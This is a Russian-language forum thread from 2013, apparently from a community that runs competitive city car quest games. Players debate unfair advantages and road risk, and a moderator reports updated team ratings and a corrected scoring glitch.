09-04-2013, 19:03
Хочу откомментировать ситуацию с доездами. Поясните, чем ментально отличаются "паровоз" и проблема с прошлой игры, когда кто-то кому-то блокировал лису. Со стороны так: обе проблемы ведут одному и тому же (кто-то получает нечестное преимущество), обе сопряжены с риском на дороге.А так-то формат линейной соревновательной автомобильной игры не провоцирует никакого риска на дороге :rolleyes:

Кюхель
10-04-2013, 01:20
А так-то формат линейной соревновательной автомобильной игры не провоцирует никакого риска на дороге :rolleyes:

Обожаю "содержательные", половинчато-выпуклообразные ответы. Кто следующий:rolleyes:?

Тэ.
10-04-2013, 06:52
Я следующая! В стремлении познать истинный дзен не упущу возможности вбросить про двойные стандарты.

DbSergey
22-04-2013, 13:31
Рейтинги в гуглдоке (http://dead-line.spb.ru/forum/showthread.php?t=2434) и на главной (http://www.dead-line.spb.ru/) обновлены. На en.cx будут обновлены, когда она оживет - сейчас она у меня еле-еле открывается.

Jaguar
22-04-2013, 13:59
Рейтинги в гуглдоке (http://dead-line.spb.ru/forum/showthread.php?t=2434) и на главной (http://www.dead-line.spb.ru/) обновлены. На en.cx будут обновлены, когда она оживет - сейчас она у меня еле-еле открывается.

там вроде Р4 не поставлены очки в рейтинге

DbSergey
22-04-2013, 14:08
там вроде Р4 не поставлены очки в рейтинге

Да, точно, спасибо. Для Р4 и для Людей-Х случился глюк. Поправлено, и на en.cx тоже обновлено.